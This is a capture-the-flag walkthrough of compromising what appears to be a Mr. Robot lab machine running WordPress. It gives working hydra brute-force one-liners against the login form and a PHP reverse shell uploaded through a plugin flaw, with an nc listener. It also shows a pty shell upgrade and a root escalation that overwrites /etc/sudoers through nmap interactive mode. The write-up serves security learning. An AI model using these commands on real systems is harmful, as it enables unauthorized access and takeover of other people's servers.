nmap -a 192.168.1.213
1. Returns port 80 & 443 not a whole lot to work with…
2. Startup a dirbuster scan while I check out what each of these commands do.
3. Dirbuster begins returning a bunch of directories showing that this website is a wordpress site!
4. Start up wordpress scan
5. WordPress scan mentions that a robot.txt is availiable at
robots.txt available under: ‘http://192.168.1.213/robots.txt’
6. Navigate to this page and this is shown.
7. Navigate to the key-1-of-3.txt and we have our first key!
1. Navigate to the fsocity.dic and download a file of 6.6 Mb
The file looks like a wordlist with about 900k words.
Will keep this in mind for potential brute forcing later.
2. Go to the wp-admin site to see what we can find.
“user” potential username?
Running on Http so view the login request in burp
Here I used username “user” and password “THEREISNOSPOON”
3. When you type in an incorrect user and password on wordpress it will tell you Invalid username! So I created this hydra one liner to brute force usernames until it cannot find the “Invalid Username”
hydra 192.168.1.213 http-form-post "/wp-login:log=^USER^&pwd=^PASS^:Invalid username" -L Desktop/fsocity.dic -p asdf -t 10 -w 30 -o output.txt
4. This command will run hydra to brute for potential usernames!
The username Elliot popped up!
I confirm this by typing in Elliot with a random password
Sure enough I get a bad password error.
5. I now edit my script to brute force the password
Whenever the password I entered was incorrect, I get “The password you entered for the username…”
hydra 192.168.1.213 http-form-post "/wp-login:log=^USER^&pwd=^PASS^:The password you entered" -P Desktop/fsocity.dic -l elliot -t 10 -w 30 -o output.txt
6. So I ran this and the first 10000 passwords didn’t work so I decided to start from the back. I didn’t feel like waiting for all 850k so I started from the back in case Jason decided to be a troll.
Ran the last 10000 passwords but hydra got stuck. One of the child processes did not complete. I guessed that this meant that the password must be in these last 10000. I cut it down to 1000 and tried again, it still got stuck. I realized that all the child process were iterating so in order for them to get stuck they must have gotten stuck in the last 10-15 passwords. This is because we cannot tell if the children moved on because there are no more passwords to check. I ran the last 15 passwords and it still got stuck!
7. At this point I plugged in all 15 passwords manually
The password was ER28-0652
Now we are met with a wordpress site.
8. First thing that comes to mind is a web shell.
9. Attempt to upload a php-reverse-shell.php in the media tab but it “Is not allowed for security reasons”
10. I just started uploading my php-reverse-shell.php everywhere I could.
11. I tried to add it as a plug in and got an error. Something like, “plugin is not valid, failed to install”
However, then I looked at my media and the reverse shell was put there! For some reason if plugins fail to install this version of wordpress puts them into the media directory…
12. Ran this command
nc -lvp 36806
13. Navigated to the reverse shell http://192.168.1.213/php-reverse-shell.php And bam, got reverse shell!
14. Went into the home directory and found key 2 of 3
Except we can’t view it…
15. However! We can view the password hash.
16. This gives us a hash we can easily crack with http://crackstation.net
The password gives us
Enter Password: abcdefghijklmnopqrstuvwxyz
This may give you some error saying “Must be run in terminal”
17. Run this command:
python -c "import pty;pty.spawn('/bin/bash')"
This will “upgrade” your shell.
Now we can see that key!
1. At this point I sat here and struggled with stuff trying to figure out what to do so I took a peek at another walkthough are saw the word nmap.
2. I found where nmap was located and realized it was running version 3.81 (current version is 7.21).
Tried to find an exploit for it or something but no luck.
Just did nmap –help and started looking at stuff.
3. After tinkering will a bunch of things, I finally booted into the nmap –interactive.
I type “h” and looked at the help and found that commands would run are root if you prefix them with “!”…
I thought there was no way that something this vulnerable would exist…
4. Sure enough, I ran
! echo "robot ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers
And obtained root. Went into the /root directory and found the last key.